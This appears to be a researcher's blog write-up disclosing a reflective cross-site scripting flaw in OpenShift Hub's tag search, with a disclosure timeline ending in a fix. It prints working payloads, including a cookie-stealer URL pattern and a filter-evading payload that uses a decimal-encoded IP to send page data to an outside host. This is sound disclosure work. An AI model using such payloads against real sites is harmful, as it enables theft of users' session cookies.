Reflective XSS in OpenShift by RedHat

OpenShift is an Open Hybrid Cloud Application Platform by Red Hat that allows developers to quickly develop, host, and scale applications in a cloud environment.

I have found a very simple reflective Cross-Site Scripting vulnerability on https://hub.openshift.com. Tag searching function wasn’t filtered at all, so it was possible to display user cookies like this:

https://hub.openshift.com/quickstarts/tags/<svg onload=alert(cookie)>

It soon turned out that stealing cookies is not so easy, because using a dot char (“.”) or a forward slash (“/” or “%2f“) resulted in an application error. No: https://lubi.cz/cookie.php?c=document.cookie for me this time…

Furthermore, the lack of dot character means that I could not use an IP address, nor file extension for cookie exfiltration. Even worse, no “http://”, nor “//” schema. But let’s take another look at XSS Filter Evasion Cheat Sheet

DWORD encoding to the rescue!

  1. Take an IP address (Google.com – 216.58.209.78) and convert it to decimal (3627733326).
  2. Set your cookie stealer at your IP address (I used “google.com/?q=” for that).
  3. Create a payload without a dot char (“.”) or a forward slash (“/” or “%2f“). Only Firefox allowed me to use “http:” schema with those restrictions. Ladies and Gentelman, please welcome:

https://hub.openshift.com/quickstarts/tags/<img src=x onerror=”location=’http:3627733326’+’%3fq=’+domain”>

didijustwin

[19th May 2015] - bug was reported
[25th August 2015] - another contact, no response
[2nd September 2015] - RedHat's response
[3rd September 2015] - partial fix
[7th October 2015] - bug was resolved

 

Leave a Reply

Your email address will not be published. Required fields are marked *